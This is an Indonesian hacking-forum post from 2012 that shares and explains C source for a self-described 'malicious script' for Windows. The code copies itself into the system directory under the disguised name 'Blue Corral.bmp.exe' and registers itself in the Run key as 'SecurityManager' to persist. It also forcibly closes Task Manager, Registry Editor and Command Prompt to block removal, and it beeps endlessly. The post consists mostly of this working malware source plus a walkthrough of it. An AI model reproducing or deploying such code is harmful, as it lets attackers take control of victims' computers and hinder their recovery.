|
| Virus ? code in C | |
| | Pengirim | Message |
---|
robofics VIP Member
Jumlah posting : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Lokasi : /dev/null
| Subyek: Virus ? code in C Wed Mar 14, 2012 10:12 am | |
| well, ane bingung ini mau ane sebut apa, virus bukan, malware bukan, malicious script kali ya ? hihi, ini sama sekali ga berbahaya sih..cuma bisa bikin panik para newbie ky ane ini gan well, ini dia source codenya - Code:
-
#include "stdafx.h" #include "windows.h"
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { HKEY hKey; char sd[255]; char path[MAX_PATH]; int Freq = 0; int Duration = 100; bool Forwards = true; bool Backwards = false; int timer = 0; HWND hWin; HMODULE GetModH = GetModuleHandle(0); GetModuleFileName(GetModH, path, 256);
GetSystemDirectory(sd,255);
strcat(sd,"\\Blue Corral.bmp.exe"); CopyFile(path,sd,FALSE); unsigned char PathToFile[20] = "Blue Corral.bmp.exe";
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, SecurityManager",0,REG_SZ,PathToFile,sizeof(PathToFile)); RegCloseKey(hKey);
while(1==1) {
hWin = FindWindow(NULL,"Windows Task Manager"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Registry Editor"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Command Prompt"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Close Program"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
if(Backwards==true) { Beep(Freq,Duration); Freq = Freq - 100; timer = timer - 1; } if (timer == 0) { Backwards = false; Forwards = true; }
if (timer == 30) { Backwards = true; Forwards = false; } if(Forwards==true) { Beep(Freq,Duration); Freq = Freq + 100; timer = timer + 1; } } return 0; } nah sekarang ke penjelasannya kk. perhatikan kode berikut - Code:
-
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, SecurityManager",0,REG_SZ,PathToFile,sizeof(PathToFile)); RegCloseKey(hKey); terlihat jelas bahwa agar dapat otomatis di load ketika startup, dia membuat sebuah key di HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run dengan nama SecurityManager...well, bagi orang yang tidak peduli dengan keamanan kompienya.. kata "SecurityManager" mungkin tidak terkesan mencurigakan.. lalu silakan perhatikan kode berikut ini - Code:
-
hWin = FindWindow(NULL,"Windows Task Manager"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Registry Editor"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Command Prompt"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0);
hWin = FindWindow(NULL,"Close Program"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); kode ini berfungsi untuk checking window name dr sebuah aplikasi..ketika dalam aplikasi itu terdapat kata2 "Windows Task Manager" atau "Registry Editor" atau "Command Prompt" atau "Close Program" maka si malicious code ini akan mengirimkan request untuk melakukan closing jendela aplikasi yg sedang berjalan tersebut secara paksa tanpa konfirmasi...semacam mode pertahanan diri kk. ok next, ini yang paling ane demen kk..bikin bingung orang perhatikan kode ini - Code:
-
if(Backwards==true) { Beep(Freq,Duration); Freq = Freq - 100; timer = timer - 1; } if (timer == 0) { Backwards = false; Forwards = true; }
if (timer == 30) { Backwards = true; Forwards = false; } if(Forwards==true) { Beep(Freq,Duration); Freq = Freq + 100; timer = timer + 1; } } return 0; } kode diatas akan membuat komputer untuk mengeluarkan suara beep dg frekuensi tertentu well, cukup bikin kaget juga sih..kalo ada salah mohon benerin kk | |
| | | robofics VIP Member
Jumlah posting : 709 Points : 804 Reputation : 20 Join date : 22.12.11 Lokasi : /dev/null
| Subyek: Re: Virus ? code in C Wed Mar 14, 2012 11:18 am | |
| up up up | |
| | | | Virus ? code in C | |
|
Similar topics | |
|
| Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
Statistics | Total 12294 user terdaftar User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
Social Networking |
|
|